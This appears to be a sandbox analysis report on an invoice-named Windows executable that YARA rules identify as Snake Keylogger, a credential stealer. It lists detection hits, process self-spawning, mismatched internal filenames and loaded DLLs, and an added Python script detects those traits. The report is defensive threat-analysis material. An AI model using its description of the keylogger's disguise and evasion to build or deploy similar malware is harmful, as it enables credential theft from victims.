Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015F4210
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015F6F92
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015FF4B0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_015FD604
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_054B0290
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_054B02A0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB2008
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB0280
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_05AB027C
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F9BA0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5588
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F34A8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F38D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F38E0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5078
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F3070
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F5069
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 0_2_079F3060
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C146
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01605370
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160D281
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C475
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160C738
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_016069A9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160E988
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CA11
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CCE1 4_2_0160CCE1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01606FC8 4_2_01606FC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160CFA9 4_2_0160CFA9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160F961 4_2_0160F961
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_016029EC 4_2_016029EC
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_0160E981 4_2_0160E981
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01603AA1 4_2_01603AA1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_01603E09 4_2_01603E09
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09D90 4_2_05A09D90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09668 4_2_05A09668
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A05148 4_2_05A05148
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0CDAF 4_2_05A0CDAF
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0CDC0 4_2_05A0CDC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A08CB1 4_2_05A08CB1
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A08CC0 4_2_05A08CC0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F4C8 4_2_05A0F4C8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F4D8 4_2_05A0F4D8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0EC28 4_2_05A0EC28
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09C3E 4_2_05A09C3E
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0EC18 4_2_05A0EC18
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A09448 4_2_05A09448
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01FA8 4_2_05A01FA8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01F9C 4_2_05A01F9C
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E7CF 4_2_05A0E7CF
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E7D0 4_2_05A0E7D0
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DF20 4_2_05A0DF20
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DF11 4_2_05A0DF11
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D660 4_2_05A0D660
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D670 4_2_05A0D670
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F923 4_2_05A0F923
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F930 4_2_05A0F930
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A05138 4_2_05A05138
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F080 4_2_05A0F080
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0003F 4_2_05A0003F
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0F071 4_2_05A0F071
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00040 4_2_05A00040
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01841 4_2_05A01841
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A01850 4_2_05A01850
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00B2D 4_2_05A00B2D
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A00B30 4_2_05A00B30
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E36B 4_2_05A0E36B
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0E378 4_2_05A0E378
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DAB9 4_2_05A0DAB9
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A02A90 4_2_05A02A90
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0DAC8 4_2_05A0DAC8
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Code function: 4_2_05A0D218 4_2_05A0D218
Source: Factura 1-2501377.exe, 00000000.00000002.887691823.0000000007950000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMontero.dll8 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.884355765.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.883791192.000000000123E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000004.00000002.3338521669.0000000000DE7000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe, 00000004.00000002.3338165117.0000000000446000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilenameRemington.exe4 vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe Binary or memory string: OriginalFilenameXgFu.exeB vs Factura 1-2501377.exe
Source: Factura 1-2501377.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.Factura 1-2501377.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.3338165117.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.885422652.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Factura 1-2501377.exe PID: 6324, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: Factura 1-2501377.exe PID: 6736, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Factura 1-2501377.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.471d7b0.3.raw.unpack, U.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.46d9990.4.raw.unpack, U.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, Mrk6b78ofS1WMbeSnM.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Factura 1-2501377.exe.7950000.6.raw.unpack, C4x3ErkRuln6Htq1Kq.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@4/4
Source: C:\Users\user\Desktop\Factura 1-2501377.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Factura 1-2501377.exe.log
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Mutant created: NULL
Source: Factura 1-2501377.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Factura 1-2501377.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003287000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.0000000003297000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032CA000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032D7000.00000004.00000800.00020000.00000000.sdmp, Factura 1-2501377.exe, 00000004.00000002.3340632815.00000000032A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Factura 1-2501377.exe ReversingLabs: Detection: 38%
Source: Factura 1-2501377.exe Virustotal: Detection: 35%
Source: unknown Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Process created: C:\Users\user\Desktop\Factura 1-2501377.exe "C:\Users\user\Desktop\Factura 1-2501377.exe"
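The process tree above (the sample launching a second copy of itself, PID 6324 spawning PID 6736) and the OriginalFilename strings earlier in the report (Remington.exe, XgFu.exe, Montero.dll inside a file named Factura 1-2501377.exe) are the two host-side artefacts most worth a detection rule. The following is an added example, not part of the Joe Sandbox report, showing both checks over constructed Sysmon-style process-creation events; the parent PIDs, the two benign rows and the self-spawn allowlist are assumptions, while the image path and OriginalFileName value mirror what the report shows.

```python
"""
Two checks for the artefacts in this report's process tree:
(1) an image spawning a copy of itself (the pattern behind "Creates a process
    in suspended mode" / "Injects a PE file into a foreign process"), and
(2) a VERSIONINFO OriginalFilename that disagrees with the on-disk name.

Events are constructed with Sysmon Event ID 1 field names; they are not the
sandbox's own log export.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional

# Constructed sample events. Parent PIDs 1234/7150 and the notepad/chrome
# rows are assumptions; the Factura rows follow the report.
EVENTS = [
    {"ProcessId": 6324, "ParentProcessId": 1234,
     "Image": r"C:\Users\user\Desktop\Factura 1-2501377.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "Remington.exe"},
    {"ProcessId": 6736, "ParentProcessId": 6324,
     "Image": r"C:\Users\user\Desktop\Factura 1-2501377.exe",
     "ParentImage": r"C:\Users\user\Desktop\Factura 1-2501377.exe",
     "OriginalFileName": "Remington.exe"},
    {"ProcessId": 7100, "ParentProcessId": 1234,
     "Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "NOTEPAD.EXE"},
    {"ProcessId": 7200, "ParentProcessId": 7150,
     "Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "OriginalFileName": "chrome.exe"},
]

# Images that legitimately spawn copies of themselves (renderer/sandbox
# children). Assumption; tune for your estate.
SELF_SPAWN_ALLOWLIST = {"chrome.exe", "msedge.exe", "firefox.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    # PureWindowsPath parses backslash paths correctly on any host OS.
    return PureWindowsPath(path).name.lower()


def self_spawn(ev: dict) -> Optional[Finding]:
    """Child image path identical to parent image path, outside the allowlist."""
    child = _basename(ev["Image"])
    same_image = ev["Image"].lower() == ev["ParentImage"].lower()
    if same_image and child not in SELF_SPAWN_ALLOWLIST:
        return Finding("self_spawn", ev["ProcessId"],
                       f"{child} spawned a copy of itself (parent pid {ev['ParentProcessId']})")
    return None


def original_filename_mismatch(ev: dict) -> Optional[Finding]:
    """VERSIONINFO OriginalFilename disagrees with the on-disk file name (case-insensitive)."""
    on_disk = _basename(ev["Image"])
    declared = ev.get("OriginalFileName", "").lower()
    if declared and declared != on_disk:
        return Finding("originalfilename_mismatch", ev["ProcessId"],
                       f"on disk {on_disk!r} but OriginalFilename {declared!r}")
    return None


def evaluate(events: List[dict]) -> List[Finding]:
    """Run every check over every event and collect the hits."""
    findings = []
    for ev in events:
        for check in (self_spawn, original_filename_mismatch):
            hit = check(ev)
            if hit:
                findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in evaluate(EVENTS):
        print(f"[{f.rule}] pid={f.pid}: {f.detail}")
```

Self-spawn on its own is noisy (browsers and some installers do it), which is why the allowlist exists; the OriginalFilename mismatch is the stronger signal here because the sandbox saw three different internal names in one image. Compare case-insensitively: Windows reports NOTEPAD.EXE for notepad.exe.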
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: dwrite.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: textshaping.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: iconcodecservice.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rasman.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Factura 1-2501377.exe Section loaded: ondemandconnroutehelper.dll
